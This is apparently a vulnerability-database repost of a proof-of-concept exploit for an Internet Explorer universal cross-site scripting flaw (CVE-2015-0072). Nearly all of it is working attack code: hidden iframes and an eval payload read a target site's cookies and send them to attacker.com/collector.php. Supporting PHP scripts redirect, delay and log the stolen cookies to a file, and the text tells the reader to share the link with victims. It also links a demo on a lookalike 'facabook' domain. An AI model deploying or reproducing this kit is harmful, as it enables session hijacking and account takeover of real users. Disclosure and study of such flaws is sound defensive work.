Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31703
HistoryFeb 11, 2015 - 12:00 a.m.

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

2015-02-1100:00:00
vulners.com
44

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Host below files on webserver (attacker.com) and share the exploit link with victims,

exploit.php — exploit link (Share with victim)

redirect.php — Script to redirect on target page (target page should not contain X-Frame-Options or it will fail)

delay.php — Script to add delay

collector.php — Script to collect hijacked cookie

log.txt — Collected cookies will be stored in this text file

-------------------------------------exploit.php-----------------------------------
<iframe src="redirect.php" style="display:none"></iframe>
<iframe src="https://target.com/&quot; style="display:none"></iframe>
<script>
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php&quot;,false&#41;,send&#40;&#41;;_.location=&quot;javascript:bkp=&#92;&#39;http://attacker.com/collector.php?&#92;&#39;+document.cookie;alert&#40;bkp&#41;;window.location&#40;bkp&#41;;&quot;&#39;&#41;;
</script>

-------------------------------------redirect.php-----------------------------------
<?php
header("Location: https://target.com/&quot;&#41;;
exit();
?>

-------------------------------------delay.php-----------------------------------
<?php
sleep(15);
echo 'Bhdresh';
exit();
?>

-------------------------------------collector.php-----------------------------------
<?php
$f = fopen("log.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/&quot;&#41;;
?>


-------------------------------------log.txt-----------------------------------

  • Create a file as log.txt and modify the permissions (chmod 777 log.txt)

Demo: facabook.net16.net/exploit.php
Reference: http://innerht.ml/blog/ie-uxss.html